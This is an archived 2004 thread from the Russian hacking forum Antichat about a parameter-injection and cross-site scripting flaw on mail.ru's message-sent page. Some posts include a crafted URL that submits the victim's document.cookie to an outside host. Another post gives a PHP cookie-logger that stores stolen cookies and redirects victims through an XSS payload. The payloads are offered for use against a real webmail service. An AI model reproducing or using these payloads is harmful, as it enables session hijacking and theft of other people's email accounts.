Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
14.06.2004, 17:11
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
Для чрезмерно категоричных в отношении "100%-ного взлома за деньги" товарищей))
Чтобы проникунцца нужной атмосферой, повторяйте все по порядку.
1) заходим на http://mail.ru , вводим свой логин, домен (к примеру yourmail@mail.ru), пароль и заходим в почту
2) Жмем "написать письмо". Адресатом указываем любой мэйл, можнол и самого себя - yourdomain@mail.ru, и нажимаем "отправить".
3)Появляется страница с сообщением "ваше письмо для yourmail@mail.ru (<ТЕМА>  отправлно.
4) Смотрим в адресную строку браузера. Там много параметров, находим:
....&user=yourmail@mail.ru&....
5)меняем yourmail@mail.ru на нудный mail'овский адрес и жмем ввод.
6)Смеемся вместе))
Думаю смысл вышеизложенной басни понятен)) |
|
|
14.06.2004, 17:38
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Гыгы, прикольно ...
Тока бесполезно ... )
|
|
|
|
14.06.2004, 17:40
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
|
|
|
|
14.06.2004, 17:57
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
там вроде все менять можно..
Я не силен в cgi-bug, поэтому не знаю, а вдруг что-то и посерьезнее можно сделать)
|
|
|
|
14.06.2004, 18:20
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Да не думаю ...
Правда в 2000 году, говорят, был один баг, позволяющий узнать секретный вопрос к любым ящикам ...
|
|
|
|
14.06.2004, 19:22
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
про взлом в 2000-ном
читал), у меня еще тогда в помине компа не было.. там другого плана. В скрытом поле пароль почему-то передавался, даже если на серкетный вопрос не правил ньо ответишь.
А здесь, я имел ввиду, что вдруг можно внедрить какую-нибудь команду) JS можно же вставлять, попробуй user=< script>alrt()</script>
|
|
|
|
15.06.2004, 19:17
|
|
Новичок
Регистрация: 13.06.2004
Сообщений: 13
Провел на форуме:
0
Репутация:
0
|
|
не знаю, может уже знаете давно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE">http://www.mail.ru/sendmsgok?Subject=KPbIC&From=&user=myiworm @mail.ru&TotalUnread=Куча&ReturnPath=w in.mail.ru/session/&To=<Form%20name=mailru%20Action="http://mbm.gratis.kg/mail.php"%20Method="POST"><input%20type=hidden%20n ame=param> </Form> < script> mailru.param.value=document.cookie;mailru.submit() ;</Script> [/QUOTE]<span id='postcolor'>
потом http://mbm.gratis.kg/cookie |
|
|
|
16.06.2004, 00:02
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
А зачем так?)
можно то же самое, но встроенное в тело письма, которое посылаешь
|
|
|
|
16.06.2004, 09:57
|
|
Новичок
Регистрация: 13.06.2004
Сообщений: 13
Провел на форуме:
0
Репутация:
0
|
|
ну да, вот то же скриптик:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE"><?
if($cookie){
$open=fopen('cookie.htm','a+');
fwrite($open,"<li>".$cookie."<br>");
fclose($open);
Header("Location: http://www.mail.ru");
}
else{
Header("Location: http://www.mail.ru/sendmsgok?Subject=fun&From=anyname&user=xx x@mail.ru&TotalUnread=0&ReturnPath=win.mai l.ru/session/&To=< script>document.location.href=\"http://yourhomepage.ru/test/cookie.php?cookie=\"+document.cookie;</script>");
}
?>[/QUOTE]<span id='postcolor'>
только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше? |
|
|
|
16.06.2004, 16:28
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mynhauzen @ июня 16 2004,09:57)</td></tr><tr><td id="QUOTE">только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?[/QUOTE]<span id='postcolor'>
Надо у Алгола спросить, он в этом хорошо разбирается, видишь, пишет что в этих куках пароля нет. Да и вообще, навряд ли ты сделаешь что -нибудь, если ты не знал, куки тоже не будут рабочими, если нажата кнопка "выход". В конце-концов, поэксперементируй со своими файлами
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
